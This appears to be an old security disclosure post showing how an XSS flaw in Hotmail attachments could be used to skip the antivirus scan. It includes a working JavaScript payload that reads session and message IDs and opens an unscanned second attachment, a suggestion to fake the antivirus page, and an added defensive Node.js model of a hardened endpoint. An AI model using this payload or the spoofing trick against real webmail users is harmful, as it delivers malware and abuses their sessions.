Krypt Kreeper
In this e-mail I will train you Microsoft monkeys (no offence), and show you a practical exploit of the XSS on the Hotmail webmail server.
It is very easy to force a target user to do something he would never have allowed: downloading a virus (from Hotmail, of course). I was thinking of some kind of mailbox access, but I needed ActiveX help, and some people could think: "I do not allow ActiveX on my browser..." or "I run Mozilla...", etc. So the challenge has been to show how, with only JavaScript, an XSS that is theoretically non-exploitable (no access to cookies), plus some misconfiguration on the Hotmail webmail, can result in a serious security problem.
1) I know XSS is present (on file attachments) (good)
2) No access to cookies from the injected code (bad)
3) It is not a flaw in input filtering; any script code is allowed (good)
4) I don't know if there is any kind of IP-based session tracking method (bad)
5) Redirecting the output of forced client requests from the XSS code is possible (good)
6) The code to successfully exploit redirection (ActiveX, XMLHttpRequest, ...) is browser dependent (bad)
So the only room one has to play in is JavaScript (exploiting the XSS with HTML injection only doesn't seem to be effective in this case...).
If we take a look at the URL from which attachments are opened, we can see the session identifier and the message identifier. With this info we can build a request to... the same message we have sent?
Yes, yes, yes. The same message (same identifier) can have many attachments...
We can make a request to the same message but a different attachment...
Why this??? Imagine that we could bypass the antivirus software with only a little modification of the HTTP request... We could not do this in the same attachment in which we send our XSS code, because that one is opened directly by the target's browser, but we could still force a crafted request from our XSS code that opens a different attachment (of the same message) without calling the AV software.
How to bypass the AV software...
This is a sample URL to get an attachment from Hotmail:
http://by7fd.bay7.hotmail.msn.com/cgi-bin/getmsg?curmbox=F000000001&a=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX&msg=MSGXXXXXXXXXX.XX&start=XXXXXXX&len=XXXX&mimepart=3&vscan=scan
"vscan=scan" ... ummm... Remove this, and the antivirus will not be called! Scared? Wait...
Now let's send the target user a mail with two attachments. The first one with this code:
-----------------------------------------------------------------------------------------------
<html>
<script>
// URL of this attachment as opened by the webmail client; it carries the
// session identifier (a=...) and the message identifier (msg=...)
str1=document.URL
// cut the substring holding those two parameters (offsets fit the sample URL above)
str2=str1.slice(55,110)
splitString = str2.split("&")
str3=splitString[0]+"&"+splitString[1]
// request another MIME part of the same message, leaving out vscan=scan
window.open('http://by7fd.bay7.hotmail.msn.com/cgi-bin/getmsg?curmbox=F000000001&a='+str3+'&mimepart=4')
</script>
</html>
-----------------------------------------------------------------------------------------------
The second attachment will be a virus test file (for example EICAR).
Once the target opens the first attachment, the AV software will tell him that all is OK, but when he tries to download the file, it will be opened "online", the XSS code will be executed, and:
- the session ID and message ID will be retrieved
- a new window will be opened pointing to the second attachment, but without calling the AV software
What does the user see?
He will see that he can download the file without any AV warning, and he will see that he is downloading from Hotmail.
An experienced user may notice that something strange is happening... but it is still possible to trick him by opening a page similar to the one shown when the AV software is called... As always, the only limit is the imagination of the attacker.
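As an added example (not code from the original post, nor Microsoft's), here is a small Node.js model of the attachment endpoint, showing the weak design the post describes beside a hardened one that ignores the client's vscan parameter and serves every part as a download. The parameter names vscan and mimepart come from the sample URL above; the function names, the stub scanner and the constructed message parts are assumptions of the example.

```javascript
// Constructed message store standing in for the Hotmail message: part 3 is a
// harmless text file, part 4 a "malicious" binary (a marker string, not real
// malware), part 5 an HTML part of the kind the post plants its script in.
const MESSAGE_PARTS = {
  3: { name: "notes.txt", type: "text/plain", body: "meeting at 10" },
  4: { name: "setup.exe", type: "application/octet-stream", body: "CONSTRUCTED-MALWARE-MARKER" },
  5: { name: "page.html", type: "text/html", body: "<script>document.URL</script>" },
};

// Stub scanner (assumption): stands in for the real AV and flags only the marker.
function scanBody(body) {
  return body.includes("CONSTRUCTED-MALWARE-MARKER") ? "infected" : "clean";
}

function parseQuery(url) {
  return Object.fromEntries(new URL(url).searchParams);
}

// Weak design, as the post describes it: the scanner runs only when the client
// sends vscan=scan, and the part is served inline under its declared type, so
// dropping the parameter skips the scan and an HTML part runs on the webmail origin.
function serveAttachmentWeak(url) {
  const q = parseQuery(url);
  const part = MESSAGE_PARTS[q.mimepart];
  if (!part) return { status: 404, scanned: false };
  const scanned = q.vscan === "scan";
  if (scanned && scanBody(part.body) === "infected") return { status: 403, scanned };
  return { status: 200, scanned, headers: { "Content-Type": part.type }, body: part.body };
}

// Hardened design: the scan decision never comes from the query string, and
// every part goes out as a download with nosniff, so attacker-supplied HTML
// is saved to disk rather than rendered with the session id in document.URL.
function serveAttachmentHardened(url) {
  const q = parseQuery(url);
  const part = MESSAGE_PARTS[q.mimepart];
  if (!part) return { status: 404, scanned: false };
  if (scanBody(part.body) === "infected") return { status: 403, scanned: true };
  const safeName = part.name.replace(/[^\w.-]/g, "_"); // keep the header unambiguous
  return {
    status: 200, scanned: true,
    headers: {
      "Content-Type": "application/octet-stream",
      "Content-Disposition": `attachment; filename="${safeName}"`,
      "X-Content-Type-Options": "nosniff",
    },
    body: part.body,
  };
}
```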
Conclusions:
- XSS is present on Hotmail
- Hotmail's antivirus software can easily be bypassed by exploiting this XSS
- Users of Hotmail are at high risk
A new generation of XSS is coming....
Sincerely,
-Krypt Kreeper-